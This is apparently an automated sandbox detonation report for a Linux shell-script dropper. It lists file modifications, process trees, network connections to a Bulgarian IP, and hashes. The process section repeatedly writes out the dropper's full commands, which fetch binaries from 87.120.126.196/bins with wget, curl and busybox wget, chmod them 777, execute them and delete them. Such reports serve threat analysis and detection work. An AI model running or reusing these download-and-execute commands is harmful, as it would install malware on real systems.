File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /usr/bin/curl N/A
File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /usr/bin/curl N/A
File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /usr/bin/curl N/A
File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /usr/bin/curl N/A
File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /usr/bin/curl N/A
File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /usr/bin/curl N/A
File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /usr/bin/curl N/A
File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /usr/bin/curl N/A
File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /usr/bin/curl N/A

Processes

/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh

[/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/chmod

[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/rm

[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/wget

[wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/chmod

[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ

[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/rm

[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/chmod

[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K

[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/rm

[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/wget

[wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/chmod

[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8

[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/rm

[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/wget

[wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/chmod

[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce

[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/rm

[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/wget

[wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/chmod

[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl

[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/rm

[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/wget

[wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/chmod

[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ

[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/rm

[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/wget

[wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/chmod

[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI

[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/rm

[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/wget

[wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/chmod

[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0

[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/rm

[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/chmod

[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr

[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/rm

[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/wget

[wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/chmod

[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs

[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/rm

[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/wget

[wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/chmod

[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2

[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/rm

[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/wget

[wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/chmod

[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI

[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/rm

[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/wget

[wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/chmod

[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ

[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/rm

[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/chmod

[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr

[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/rm

[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/wget

[wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/chmod

[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs

[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/rm

[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/wget

[wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/chmod

[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2

[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/rm

[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/wget

[wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/chmod

[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0

[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/rm

[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/chmod

[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ

[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/rm

[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/chmod

[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K

[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/rm

[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/wget

[wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/chmod

[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/rm

[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/wget

[wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/chmod

[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce

[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/rm

[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/wget

[wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/chmod

[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl

[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/rm

[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/wget

[wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/chmod

[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8

[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/rm

[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-21 01:20

Reported

2024-10-21 01:22

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

7s

Max time network

131s

Command Line

[/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE N/A
N/A /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ N/A
N/A /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K N/A
N/A /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 N/A
N/A /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce N/A
N/A /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl N/A
N/A /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A
N/A /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI N/A
N/A /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 N/A
N/A /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr N/A
N/A /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs N/A
N/A /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A
